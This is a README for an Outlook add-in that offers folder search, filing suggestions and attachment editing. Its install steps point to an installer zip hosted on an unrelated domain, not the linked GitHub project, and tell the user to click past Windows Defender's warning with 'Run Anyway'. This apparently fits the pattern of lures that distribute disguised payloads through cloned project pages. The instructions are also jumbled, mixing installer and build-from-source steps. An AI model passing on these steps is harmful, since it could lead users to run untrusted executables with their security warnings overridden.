MS Outlook add-in with functionalities for handling multiple mail folders, suggestions for moving mail items into folders and reorganizing attachments from the compose window.
- About The Project
- Getting Started
- Functionalities
- Find folder by typing the first letters of its name
- Move between folders with same name on different PSTs (next/previous)
- Display list of recenty used folders
- Show suggestion one where to file a mail items based on recent folders, other items in the conversation, and otehr items with the same sender
- Attachment helper, allowing attachments manipulations directly from the composing windows:
- Change file name of attachments
- Change order of attachments
- Accept all changes in an attachment (for Word documents)
- Create zip file with the attachments and attach to the mail item
-
Download the installer from https://recommend.roboguide.xyz/static/Mailbox-Angel.zip.
-
Extract the zip file to a temporary folder.
-
In the temporary folder, run setup.exe. If asked by Windows Defender to confirm the installation, click "More Info" and "Run Anyway".
-
Once the package has been installed, run Outlook. On first run, you might be asked if you want to reset your suggestions - click "ok".
-
Open MailboxAngel.sln with MS Visual Studio and build the entire solution.
-
Mailbox Angel will be added to the list of available Outlook addins. Select the addin to activate it.
-
Run Outlook. On first run, you might be asked if you want to reset your suggestions - click "ok".
- You can search for a folder by part of its name by entering a string in the Search box
- A new window will be opened with the matching folders and their respective subfolders
- You can select folder from the list to change the current folder.
- You can go back to the previous folder by clicking Undo.
- The addin tracks the last folders you are using (either by exploring or moving items to them).
- You can view the list of last used folders by clicking History on the ribbon and go to any of these folders.
- You can designate the current folder to contantly be included on the or to never incluide on the list by click Always or Never at the bottom of the History menu
- If you have folders with same structure in different PSTs, you can scroll between the current folder in your mailbox and the same folder in the connected PSTs by clicking Next and Prev.
- The addin will search for the same folder structure in the next/previous connected PST and will make the folder with the same name the displayed folder.
- If the add-in does not find a folder with the same name, it will move to the next PST or mailbox.
- The addin tracks where evey email from each sender is moved from the inbox.
- By clicking Suggestions it can provide suggested folders to move the specific email, based on:
- Suggestion: previous emails with the same sender
- Convesation: where other email items from the same conversation are located
- History: previously used folders.
- If the conversation header rather than a specific email in teh conversation are selected, all emails in the specific conversation located in the current folder will be moved.
- The Attachment Manager allows the user complete control of an email's attachment, directly from the new email composition window.
- To start, click Attachment Manager from the Compose window, and the Attachment window will loan the existing attachment.
- For each attachment, you could:
- Rename the attachment as it will appear to the recepient
- Delete the attachment
- Reorder the attachments by drag and drop or clicking the Up and Down buttons
- Approve all marked changes (MS Word documents only)
- Add certain attachments to a zip file thatwill be automatically added to the mail item
- You can also add numbers to all attachment names and add a list of attachments to the email body (in case you want to add comments for each file).
- After you're done, click Apply to process the changes and update the mail item.
To get a local copy up and running follow these simple steps.
This addin is known to work with Microsoft Outlook 2013 and above. As the solution was built with MS .Net, it will require .Net Runtime to be installed
Distributed under the MIT License subject to "Commons Clause” License Condition v1.0. See LICENSE
for more information.
Shai Shulman - @shaishulman - shai.shulman@gmail.com
Project Link: https://github.com/github_shaishulman/MailboxAngel